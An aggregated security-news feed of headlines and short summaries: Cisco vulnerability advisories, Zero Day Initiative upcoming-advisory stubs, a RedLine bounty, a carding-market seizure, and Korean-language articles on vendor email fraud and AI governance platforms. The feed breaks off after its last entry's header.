Researchers have come up with a fix for a path traversal bug first spotted in 2010 A security bug that surfaced fifteen years ago in a public post on GitHub has survived developers' attempts on its life.

https://go.theregister.com/feed/www.theregister.com/2025/06/05/llm_kept_persistent_path_traversal_bug_alive/
US offers $10M for tips on state hackers tied to RedLine malware
2025-06-05T06:25:21Z | 1749104721

The U.S. Department of State has announced a reward of up to $10 million for any information on government-sponsored hackers with ties to the RedLine infostealer malware operation and its suspected creator, Russian national Maxim Alexandrovich Rudometov.

https://www.bleepingcomputer.com/news/security/us-offers-10m-for-tips-on-state-hackers-tied-to-redline-malware/
“도난 시도만 3억 달러 이상”··· AI 기반 ‘벤더 이메일 손상 공격’에 주목할 이유
2025-06-05T06:16:30Z | 1749104190

이메일 보안 기업 애브노멀AI(Abnormal AI)는 최근 보고서를 통해 VEC 공격이 기술적 취약점이 아닌 사람의 신뢰를 악용하는 방식으로 기존 방어 체계를 뚫고 있다고 진단했다. 보고서에 따르면 대기업 직원의 72%가 링크나 첨부 파일이 없는 사기성 벤더 이메일에 응답하거나 전달한 경험이 있는 것으로 나타났다. VEC 공격은 지난 1년간 전 세계적으로 3억 달러 이상의 도난 시도를 유발했으며, 기존의 BEC(Business Email Compromise)보다 90% 더 높은 참여율을 보였다. 보고서는 특히 유럽·중동·아프리카(EMEA) 지역이 특히 위협에 직면해 있다고 분석했다. EMEA 지역 직원들은 VEC 이메일과 가장 많이 상호 작용했지만, 해당 사기 이메일을 보고한 비율은 0.27%에 불과해 전 세계에서 가장 낮은 신고율을 기록했다. 가장 취약한 산업군은 통신 분야로 직원의 71.3%가 VEC 이메일에 반응했으며, 에너지 및 유틸리티 산업군이 56.25%로 그 뒤를 이었다. 애브노멀AI의 CIO 마이크 브리튼은 “이메일 기반의 사회공학적 공격이 그 어느 때보다 정교하고 효과적”이라며 “공격자는 합법적인 벤더 이메일 대화 스레드를 탈취해 정교하게 위장한 메시지를 생성하고, 이를 통해 기존 방어체계를 피해간다. 직원들이 해당 이메일을 진짜라고 믿는 만큼 응답률이 놀라울 정도로 높다”라고 설명했다. 보고서는 EMEA 지역 내에서도 특히 영업팀의 신입 직원이 VEC 이메일의 86%에 반응해 가장 위험한 상황이라고 분석했다. 해당 지역에서 일반적인 BEC 공격은 기업이 4.22%를 탐지하고 신고하는 데 비해, VEC 공격은 98.5%가 신고되지 않은 채 재무 손실이 발생한 이후에야 발견되는 경우가 많았다. 이는 아시아 태평양(APAC) 지역에서 BEC가 여전히 주요 위협으로 작용하며, 44.4%의 직원 참여율을 보인 것과는 대조적이다. QKS그룹의 애널리스트 수짓 두발은 “생성형 AI의 등장으로 VEC 공격의 정밀도가 매우 정밀하고 치밀하게 진화했다”라며 “이제는 누구나 알아차릴 수 있는 피싱 메일이 아닌, 다단계 인증과 다양한 보안 조치를 우회하는 고도로 정제된 비즈니스 커뮤니케이션”이라고 평가했다. AI가 공격 복잡성 증폭 전통적인 피싱과 달리 VEC 공격은 실제 기업 이메일 스레드를 모방하는 방식으로 이뤄진다. 공격자는 AI를 이용해 이메일의 어조, 브랜드, 대화 기록을 정밀하게 재현한다. 탐지 시스템이 인식할 만한 징후가 없어 필터를 쉽게 우회하며, 심지어 신중한 직원들조차 속일 수 있다. 특히 인재 시장이 위축된 상황에서 직원들이 지급 지연 등의 문제를 빠르게 해결하려다 이런 이메일에 쉽게 반응하는 경향이 나타나고 있다. 두발은 “다단계 인증 같은 기존 보안 수단이 이러한 AI 기반 공격에는 효과를 발휘하지 못하고 있다”라며 “단순히 계정 자격 증명 검증을 넘어, 심리적 조작까지 대응할 수 있는 보안 전략 전환이 필요하다”라고 강조했다. 또한 그는 “AI 기반 VEC 공격은 기존의 경계 보안만으로는 차단할 수 없다”며, 조직이 세 가지 핵심 대응 체계를 도입해야 한다고 강조했다. 구체적으로는 “미세한 이상 징후를 감지할 수 있는 AI 기반 이메일 분석 시스템, 실시간 벤더 검증 절차, 기술적 위협뿐 아니라 사회공학적 수법까지 인지할 수 있도록 재교육받은 직원이 필요하다”라고 설명했다. VEC 공격의 전체 발생 건수는 피싱이나 랜섬웨어보다 적지만, 성공률과 재무적 피해 가능성은 훨씬 더 크다. 브리튼은 “무기화된 AI는 신뢰받는 벤더를 흉내 내는 과정을 그 어느 때보다 쉽게 만든다. 수동적인 보안 교육에서 벗어나, 이메일이 받은편지함에 도달하기 전에 위협을 차단할 수 있는 선제적 방어 전략을 도입해야 한다”라고 조언했다.dl-ciokorea@foundryco.com

https://www.cio.com/article/4002188/%eb%8f%84%eb%82%9c-%ec%8b%9c%eb%8f%84%eb%a7%8c-3%ec%96%b5-%eb%8b%ac%eb%9f%ac-%ec%9d%b4%ec%83%81%c2%b7%c2%b7%c2%b7-ai-%ea%b8%b0%eb%b0%98-%eb%b2%a4%eb%8d%94-%ec%9d%b4%eb%a9%94%ec%9d%bc-%ec%86%90.html
Cybersecurity Training in Africa Aims to Bolster Professionals' Ranks
2025-06-05T06:00:00Z | 1749103200

The United Nations, Carnegie Mellon University, and private organizations are all aiming to train the next generation of cybersecurity experts, boost economies, and disrupt pipelines to armed groups.

https://www.darkreading.com/cybersecurity-operations/cybersecurity-training-africa-professionals-ranks
Cisco Unified Intelligent Contact Management Enterprise Cross-Site Scripting Vulnerability
2025-06-05T06:00:00Z | 1749103200

A vulnerability in the web-based management interface of Cisco Unified Intelligent Contact Management Enterprise could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. This vulnerability is due to insufficient user input validation. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. Cisco plans to release software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-icm-xss-cfcqhXAg Security Impact Rating: Medium CVE: CVE-2025-20273

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-icm-xss-cfcqhXAg
Cisco Identity Services Engine Arbitrary File Upload Vulnerability
2025-06-05T06:00:00Z | 1749103200

A vulnerability in the API of Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker with administrative privileges to upload files to an affected device. This vulnerability is due to improper validation of the file copy function. An attacker could exploit this vulnerability by sending a crafted file upload request to a specific API endpoint. A successful exploit could allow the attacker to upload arbitrary files to an affected system. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-file-upload-P4M8vwXY Security Impact Rating: Medium CVE: CVE-2025-20130

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-file-upload-P4M8vwXY
Cisco Nexus Dashboard Fabric Controller SSH Host Key Validation Vulnerability
2025-06-05T06:00:00Z | 1749103200

A vulnerability in the SSH implementation of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an unauthenticated, remote attacker to impersonate Cisco NDFC-managed devices. This vulnerability is due to insufficient SSH host key validation. An attacker could exploit this vulnerability by performing a machine-in-the-middle attack on SSH connections to Cisco NDFC-managed devices, which could allow an attacker to intercept this traffic. A successful exploit could allow the attacker to impersonate a managed device and capture user credentials. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ndfc-shkv-snQJtjrp Security Impact Rating: High CVE: CVE-2025-20163

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ndfc-shkv-snQJtjrp
Cisco ThousandEyes Endpoint Agent for Windows Arbitrary File Delete Vulnerabilities
2025-06-05T06:00:00Z | 1749103200

Multiple vulnerabilities in the update process of Cisco ThousandEyes Endpoint Agent for Windows could allow an authenticated, local attacker to delete arbitrary files on an affected device. These vulnerabilities are due to improper access controls on files that are in the local file system. An attacker could exploit these vulnerabilities by using a symbolic link to perform an agent upgrade that redirects the delete operation of any protected file. A successful exploit could allow the attacker to delete arbitrary files from the file system of the affected device. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-te-endagent-filewrt-zNcDqNRJ Security Impact Rating: Medium CVE: CVE-2025-20259

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-te-endagent-filewrt-zNcDqNRJ
Cisco Unified Contact Center Express Editor Remote Code Execution Vulnerability
2025-06-05T06:00:00Z | 1749103200

A vulnerability in the file opening process of Cisco Unified Contact Center Express (Unified CCX) Editor could allow an unauthenticated attacker to execute arbitrary code on an affected device.  This vulnerability is due to insecure deserialization of Java objects by the affected software. An attacker could exploit this vulnerability by persuading an authenticated, local user to open a crafted .aef file. A successful exploit could allow the attacker to execute arbitrary code on the host that is running the editor application with the privileges of the user who launched it. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-uccx-editor-rce-ezyYZte8 Security Impact Rating: Medium CVE: CVE-2025-20275

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-uccx-editor-rce-ezyYZte8
Cisco Unified Contact Center Express Vulnerabilities
2025-06-05T06:00:00Z | 1749103200

Multiple vulnerabilities in the web-based management interface of Cisco Unified Contact Center Express (Unified CCX) could allow an authenticated, remote attacker to perform a stored cross-site scripting (XSS) attack or execute arbitrary code on an affected device. To exploit these vulnerabilities, the attacker must have valid administrative credentials. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-uccx-multi-UhOTvPGL Security Impact Rating: Medium CVE: CVE-2025-20276,CVE-2025-20277,CVE-2025-20279

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-uccx-multi-UhOTvPGL
Cisco Integrated Management Controller Privilege Escalation Vulnerability
2025-06-05T06:00:00Z | 1749103200

A vulnerability in the SSH connection handling of Cisco Integrated Management Controller (IMC) for Cisco UCS B-Series, UCS C-Series, UCS S-Series, and UCS X-Series Servers could allow an authenticated, remote attacker to access internal services with elevated privileges. This vulnerability is due to insufficient restrictions on access to internal services. An attacker with a valid user account could exploit this vulnerability by using crafted syntax when connecting to the Cisco IMC of an affected device through SSH. A successful exploit could allow the attacker to access internal services with elevated privileges, which may allow unauthorized modifications to the system, including the possibility of creating new administrator accounts on the affected device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability, but a mitigation is available. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ucs-ssh-priv-esc-2mZDtdjM Security Impact Rating: High CVE: CVE-2025-20261

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ucs-ssh-priv-esc-2mZDtdjM
Cisco Unified Communications Products Command Injection Vulnerability
2025-06-05T06:00:00Z | 1749103200

A vulnerability in the CLI of multiple Cisco Unified Communications products could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system of an affected device as the root user. This vulnerability is due to improper validation of user-supplied command arguments. An attacker could exploit this vulnerability by executing crafted commands on the CLI of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system of an affected device as the root user. To exploit this vulnerability, the attacker must have valid administrative credentials. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vos-command-inject-65s2UCYy Security Impact Rating: Medium CVE: CVE-2025-20278

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vos-command-inject-65s2UCYy
Cisco Customer Collaboration Platform Information Disclosure Vulnerability
2025-06-05T06:00:00Z | 1749103200

A vulnerability in the web-based chat interface of Cisco Customer Collaboration Platform (CCP), formerly Cisco SocialMiner, could allow an unauthenticated, remote attacker to persuade users to disclose sensitive data. This vulnerability is due to improper sanitization of HTTP requests that are sent to the web-based chat interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to the chat interface of a targeted user on a vulnerable server. A successful exploit could allow the attacker to redirect chat traffic to a server that is under their control, resulting in sensitive information being redirected to the attacker. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ccp-info-disc-ZyGerQpd Security Impact Rating: Medium CVE: CVE-2025-20129

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ccp-info-disc-ZyGerQpd
Law enforcement seized the carding marketplace BidenCash
2025-06-05T05:51:23Z | 1749102683

U.S. and Dutch authorities took down 145 domains tied to the BidenCash cybercrime marketplace in a coordinated law enforcement operation. The US DoJ announced the seizure of approximately 145 darknet and clear web domains, and cryptocurrency funds associated with the BidenCash marketplace. “The U.S. Attorney’s Office for the Eastern District of Virginia announced today the […]

https://securityaffairs.com/178655/cyber-crime/law-enforcement-seized-the-carding-marketplace-bidencash.html
Critical Cisco ISE Auth Bypass Flaw Impacts Cloud Deployments on AWS, Azure, and OCI
2025-06-05T05:37:00Z | 1749101820

Cisco has released security patches to address a critical security flaw impacting the Identity Services Engine (ISE) that, if successfully exploited, could allow unauthenticated actors to carry out malicious actions on susceptible systems. The security defect, tracked as CVE-2025-20286, carries a CVSS score of 9.9 out of 10.0. It has been described as a static credential vulnerability. "A...

https://thehackernews.com/2025/06/critical-cisco-ise-auth-bypass-flaw.html
“솔루션도 기업도 아직은 초기” AI 거버넌스 플랫폼 시장 현황과 기업의 고려사항
2025-06-05T05:32:51Z | 1749101571

프린시펄 파이낸셜 그룹(Principal Financial Group, PFG)은 지난 몇 년 동안 AI 활용이 급증하면서 이를 종합적으로 관리할 수 있는 AI 거버넌스 전략과 이를 실행할 도구가 절실해졌다. PFG의 부사장 겸 최고 데이터 및 분석 책임자인 라제시 아로라는 “현재 자연어 처리, 머신러닝, 생성형 AI 모델 등 100건 이상의 AI 사용례를 운영 중이며, 이를 통해 사기 탐지, 보험금 청구 자동화, 투자 리서치, 퇴직연금 최적화, 고객센터 지원 업무를 수행하고 있다”고 설명했다. 아로라는 “그러나 각각의 사용례는 규제 준수, 편향, 윤리 문제와 같은 리스크를 동반하고 있으며, 이를 해결하기 위해 AI 거버넌스 전략이 필요하다”고 강조했다. PFG는 먼저 AI 도입부터 리스크 분류, 모델 검증, 지속적인 모니터링에 이르는 전 생애 주기를 관리하는 ‘윤리적이고 책임 있는 AI(Ethical and Responsible AI, ERAI)’ 프레임워크를 개발했다. 이 프레임워크는 모든 AI 애플리케이션에 설명 가능성, 인간의 감독, 개인정보 보호를 필수 요건으로 설정했다. 이어 AI 거버넌스 플랫폼인 크레도 AI(Credo AI)를 도입해 모든 AI 애플리케이션을 인벤토리화하고, 리스크 평가, 데이터 프라이버시, 규정 준수 추적, AI 규제 및 표준과의 일치를 지원하도록 했다. 아로라는 “서비스나우 기반 거버넌스 워크플로우도 일부 시범 운영 중”이라고 덧붙였다. 가트너의 부사장이자 수석 애널리스트인 아비바 리탄은 “AI가 유발하는 리스크는 매우 현실적”이라며, “특히 생성형 AI의 경우 데이터 유출, 손상, 부정확하고 원치 않는 결과물로 인해 잘못된 의사결정이 내려질 가능성이 크다”고 경고했다. EY의 책임감 있는 AI 리더인 신클레어 슐러는 “AI 거버넌스는 모든 비즈니스에 반드시 필요한 핵심 과제”라며, “거버넌스 실패는 기업 자체의 실패로 이어질 수 있다”고 강조했다. 이처럼 문제를 해결해야 할 필요성은 분명하지만, 실제 도입 속도는 그 긴박성에 비해 더디게 진행되고 있다. 느린 도입 곡선 가트너는 2025년 전략적 기술 트렌드 가운데 두 번째로 AI 거버넌스 플랫폼을 꼽았다. 이런 도구를 활용하는 기업은 AI 관련 윤리 이슈가 40%가량 줄어들 것으로 예상하고 있다. 그러나 여전히 AI 거버넌스 플랫폼은 널리 사용되지 않고 있으며, 이는 플랫폼이 기술적으로 미성숙해서가 아니라는 것이 리탄의 설명이다. 리탄은 “CIO는 AI의 ROI도 입증하기 어려운 상황에서 또 다른 플랫폼에 투자하려 들지 않는다”고 지적했다. 지금까지 보안 및 리스크 관리는 항상 후순위였다. 예를 들어, 웨브스터 뱅크의 부사장이자 CIO인 비크람 나프데는 이미 생성형 AI를 문서 처리, 비정형 데이터 관리, 동료 간 신용 평가 등 다양한 비즈니스 프로세스에 적용하고 있지만, 아직 별도의 AI 거버넌스 플랫폼은 도입하지 않았다. 대신 나프데는 AI 활용에 대한 내부 거버넌스 가이드라인을 수립하고 공식적인 AI 사용 정책을 마련했으며, AI 설계 및 구현, 운영 전반에 책임과 전략 방향을 제시할 AI 거버넌스 위원회를 신설했다. 나프데는 “현재 우리는 지라, 셰어포인트, 서비스나우 같은 기존 엔터프라이즈 도구를 활용해 워크플로우, 통제, 증적 관리 등의 AI 거버넌스 요소를 관리하고 있다”고 설명했다. 또 “이와 동시에 전체 AI 거버넌스 생애 주기를 포괄하고, 내부 리스크, 법무, 데이터, 보안 도메인과 통합 가능한 단일 플랫폼도 검토 중”이라고 밝혔다. 리탄은 AI가 자율적으로 의사결정을 내리는 ‘에이전틱 AI’ 기술이 확산되면서 AI 거버넌스 플랫폼 도입이 가속화될 것이라고 전망했다. 리탄은 “에이전틱 AI는 예측 불가능하고 언제든 통제 불능 상태에 빠질 수 있기 때문에 반드시 제어 장치가 필요하다”고 강조했다. 현재 많은 기업이 수동 검토와 정책을 통해 AI를 통제하고 있지만, 향후 2년 안에 자율 에이전트가 본격 확산되면 수동 방식으로는 속도를 따라잡을 수 없다는 것이다. 리탄은 “지금은 과대광고가 많고 실제 도입은 적다”며, “생산성 정점(Gartner가 말하는 대중화 시점)에 도달하려면 몇 년은 더 걸릴 것”이라고 전망했다. AI 거버넌스 도구 현황 AI 비즈니스 전략 컨설팅 전문업체 닥터 리사 AI(Dr. Lisa AI)의 CEO 겸 최고 AI 책임자인 리사 파머는 “AI 거버넌스 플랫폼은 CIO가 모델 성능을 모니터링하고, 편향을 탐지하며, 정책을 집행하고, 컴플라이언스 검토를 간소화하는 데 도움을 줄 수 있다”라고 설명했다. 파머는 CIO 자문 가이드 ‘모든 CIO/CAIO가 반드시 책임져야 할 5가지 전략적 AI 거버넌스 과제’에서 “이 도구는 모델 내 편향과 공정성 문제를 탐지하고, 특성 기여도와 히트맵 같은 설명 가능성 기능을 제공하며, 모델 성능, 드리프트, 규정 준수 상태를 실시간으로 모니터링할 수 있다”라고 분석했다. 파머는 “피들러, 트루에라, 크레도 AI 같은 도구는 설명 가능성의 공백을 드러내고 데이터 계보를 추적하며, 실제 운영 환경에서 모델이 기대한 대로 작동하는지 확인할 수 있다”라고 설명했다. 이어 “하지만 인간의 판단을 대체하거나 비즈니스 가치를 정의하거나 AI 사용례를 전략적 우선순위에 자동으로 맞추는 기능은 제공하지 않는다”고 덧붙였다. 리탄은 현재 AI 거버넌스 플랫폼 시장에 30~40개 업체가 진출해 있다고 추정했다. 그러나 “채택률이 낮아 고객 사례를 찾기 어렵고, 이것이 가트너가 아직 주요 업체와 후발주자를 구분한 매직 쿼드런트를 발표하지 않은 이유 중 하나”라고 설명했다. 다만 리탄은 “일부 업체는 AI 거버넌스의 특정 영역에서 강점을 보이고 있다”고 덧붙였다. 예를 들어, 제니티(Zenity)는 마이크로소프트 365 코파일럿 같은 제품 모니터링에 강하고, 크레이니엄(Cranium)은 서드파티 리스크 관리, 노마 시큐리티(Noma Security)는 인프라 및 런타임 위반 탐지, 홀리스틱(Holistic)은 편향 테스트에서 우수한 성능을 보인다고 평가했다. 슐러는 “AI 거버넌스 도구는 챗GPT나 앤트로픽 같은 서드파티 AI 이용 정책 수립과 집행뿐 아니라, 내부 AI 자산 설계 및 개발 정책 수립에도 도움이 된다”라며, “이런 도구는 활용 정책을 기술하고 정책 집행을 지원할 수 있다”라고 설명했다. 도입 전 준비 단계 AI 거버넌스 도구를 평가하기 전에 CIO는 먼저 AI 애플리케이션 목록을 작성하고 정책 프레임워크를 수립해야 한다. 파머는 “도구가 해결해야 할 문제는 무엇이며, 거버넌스 결과에 대한 책임자는 누구인지, 어떤 정책과 워크플로우, 임계값이 존재하거나 마련되어야 하는지를 명확히 해야 한다”라며, “이런 기준이 없으면 아무리 뛰어난 도구라도 기대 이하의 결과를 낼 수 있다”고 지적했다. 이어 “CIO는 먼저 자사의 활용 사례를 식별하고, 리스크 등급을 평가해야 한다. 초기 단계 조직은 MLOps 플랫폼이 유용하고, 성숙한 조직은 정책 집행 계층이나 편향 자동 감사 기능이 필요하다”고 조언했다. 리탄은 “우선 체계를 잡아야 한다”고 강조하며, “AI 책임성에 대한 정책을 정의하고 모든 AI를 파악하며, 누가 어떤 도구를 어떻게 사용하고 있으며, 얼마나 위험한지를 정확히 이해해야 한다. 이후 데이터를 정비해야 한다. 권한과 분류 상태가 적절한지, 그리고 보안이 철저한지 확실히 해야 한다”라고 설명했다. AI 거버넌스 도구에서 확인해야할 요소 파머는 도구를 평가할 때 모델 설명 가능성, 편향 탐지, 정책 자동화 및 규칙 기반 규정 준수 트리거, 실시간 성능 모니터링, 감사 가능성과 규제 감사를 위한 문서화, 기존 모델 개발 생애 주기와의 통합 여부 등을 주요 기능으로 꼽았다. 슐러는 “솔루션 업체와 논의할 수 있는 평가 기준을 사전에 마련하고, 자사 거버넌스 모델의 미래 모습이 어떤지 구체적으로 설정해야 한다”며 “해당 플랫폼이 이를 구현하지 못하면 후보에서 제외해야 한다”라고 강조했다. 또한 “모든 프로젝트에 적용되는 거버넌스 정책을 정의하고, 이 정책을 상속받는 하위 정책을 만들 수 있는 기능이 있는 플랫폼을 선택하라”고 조언했다. 나프데도 “이 기능은 여러 사업 부문이나 도메인 전반에 걸쳐 대규모 거버넌스를 관리할 때 매우 강력하다”라며, “기본 정책을 유지하면서도 상황에 맞게 조정할 수 있는 능력이 혁신을 저해하지 않으면서도 조직적 일치를 이루는 핵심 요소”라고 분석했다. 슐러는 “정책 승인에는 여전히 사람의 개입이 필요하다”라며, “중간 점검 단계에서 정책 승인 여부를 결정해야 한다. 결국 AI 거버넌스는 사람이 수행하는 일”이라고 강조했다. 파머는 도구 평가 시 통합 수준, 다양한 역할에 걸친 사용성, 모델 및 규제 변화에 따른 플랫폼의 적응력을 고려해야 한다고 설명했다. 또 “AI 거버넌스는 법무, 컴플라이언스, 비즈니스 이해관계자가 모두 연관되어 있어 도구에 대한 부서 간 접근성이 특히 중요하다”라고 덧붙였다. 아로라는 PFG가 도구를 선택할 때 사용성과 맞춤화, 확장성은 물론, 거버넌스 전략 변화에 맞춰 도구가 진화할 수 있는지도 중요하게 평가했다고 설명했다. 또한 “도구의 기능성, 성능, TCO도 주요 기준이었다”라고 밝혔다. 하지만 아로라는 평가 과정에서 조직 특화 AI 애플리케이션처럼 주관적 판단이 필요한 경우, 많은 도구가 한계를 보였다고 전했다. 그는 “도구 학습과 운영화에 시간이 많이 걸리고, 기존 시스템과의 통합도 간단하지 않다. 또한 데이터 품질, 정확성, 완전성 같은 기본적인 문제를 해결하지 못하는 경우도 많았다”고 지적했다. 통제할 수 있는 AI를 위해 해야 할 일 AI 거버넌스 플랫폼이 있으면 좋지만, 구매를 서두를 필요는 없다. 나프데는 “먼저 자사의 거버넌스 프레임워크와 프로세스를 정의해야 한다”라며, “AI 활용 범위와 관련 리스크를 명확히 파악한 후, 이를 바탕으로 도구를 선택해야 한다”라고 강조했다. 그리고 솔루션 업체가 기꺼이 가격 협상을 한다고 해서 놀랄 필요는 없다. 리탄은 “AI 거버넌스는 솔루션 업체가 가격을 깎아줄 수 있을 정도로 초기 시장이다. 하지만 문제는 거버넌스 도구 구매 비용이 아니라 시간, 자원, 인력 측면의 비용이다. “기업 인력이 이미 부족한 상황이라 거버넌스를 누가 관리할지도 불분명하다”라고 지적했다. 파머는 “AI 거버넌스 도구가 모니터링에는 도움이 되지만, CIO는 여전히 비즈니스 관점에서 수용 가능한 리스크를 정의하고 AI 프로젝트를 전략적 성과와 맞추고, 전사적 거버넌스 전략을 수립해야 한다”고 조언했다. 그리고 “이런 플랫폼은 사용자를 대신해 거버넌스 전략을 정의해주지 않으며, 대부분 AI 기반 대중 여론 조작, 조직적인 대량 항의, 평판 조작과 같은 외부 위협은 다루지 못한다. 이는 CIO가 간과해서는 안 될 사각지대”라고 경고했다. 실제 운영을 시작한 후에는 정책을 지나치게 엄격하게 설정하지 않는 것이 좋다. 쉴러는 “AI는 창의력 엔진”이라며, “이를 통제할 필요는 있지만, 너무 억제하면 창의성을 발휘할 수 없게 된다”라고 설명했다. 아로라는 “AI 거버넌스 플랫폼이 할 수 있는 일에는 한계가 있다”라며, “산업 차원에서 책임 있는 AI와 보안 정책이 아직 성숙하지 않고 명확히 정의되어 있지 않기 때문에, 이로 인해 거버넌스 도구의 효과가 제한될 수 있다”고 분석했다. 또 “이런 기반이 부족하면 거버넌스 도구는 제 기능을 다 하지 못한다. AI 거버넌스를 단순한 규정 준수 요건이 아니라 비즈니스 역량으로 바라봐야 한다”라며, “조직 구조에 맞게 유연하게 적용되면서도 일관된 기준을 강력하게 집행할 수 있는 도구를 선택”하라고 조언했다. AI 분야는 매우 빠르게 변화하고 있으므로, 플랫폼을 도입한 이후에는 정기적인 리뷰가 필수적이다. 슐러는 “정책을 수정해야 하는 시점을 놓치지 않도록 한 달 또는 분기 단위의 아주 짧은 검토 주기를 유지할 것”을 제안했다.dl-ciokorea@foundryco.com

https://www.cio.com/article/4002185/%ec%86%94%eb%a3%a8%ec%85%98%eb%8f%84-%ea%b8%b0%ec%97%85%eb%8f%84-%ec%95%84%ec%a7%81%ec%9d%80-%ec%b4%88%ea%b8%b0-ai-%ea%b1%b0%eb%b2%84%eb%84%8c%ec%8a%a4-%ed%94%8c%eb%9e%ab%ed%8f%bc.html
ZDI-CAN-26616: Apple
2025-06-05T05:00:00Z | 1749099600

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Gary Kwong' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-24915: Marvell
2025-06-05T05:00:00Z | 1749099600

A CVSS score 9.4 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H severity vulnerability discovered by 'Andrea Micalizzi aka rgod (@rgod777)' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26856: Ivanti
2025-06-05T05:00:00Z | 1749099600

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26861: Ivanti
2025-06-05T05:00:00Z | 1749099600

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26912: Ivanti
2025-06-05T05:00:00Z | 1749099600

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26858: Ivanti
2025-06-05T05:00:00Z | 1749099600

A CVSS score 7.2 AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by '06fe5fd2bc53027c4a3b7e395af0b850e7b8a044' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27198: RARLAB
2025-06-05T05:00:00Z | 1749099600

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'whs3-detonator' was reported to the affected vendor on: 2025-06-05, 1 days ago. The vendor is given until 2025-10-03 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26864: Ivanti
2025-06-05T05:00:00Z | 1749099600

